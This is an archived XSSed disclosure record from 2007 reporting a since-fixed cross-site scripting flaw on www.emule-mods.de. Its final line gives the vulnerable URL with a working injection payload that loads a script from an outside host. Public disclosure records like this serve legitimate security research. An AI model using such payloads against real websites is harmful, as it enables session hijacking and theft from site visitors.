Fixed XSS vulnerability at www.emule-mods.de

2007-03-11T00:00:00
ID XSSED:24799
Type xssed
Reporter fox91
Modified 2007-05-11T00:00:00

Description

Security researcher fox91, has submitted on 03/11/2007 a cross-site-scripting (XSS) vulnerability affecting www.emule-mods.de, which at the time of submission ranked 67672 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently fixed.

Vulnerable URL: http://www.emule-mods.de/?mods='%3E%3Cscript/xss+src=http://ckers.org/s%3E%3C/script%3E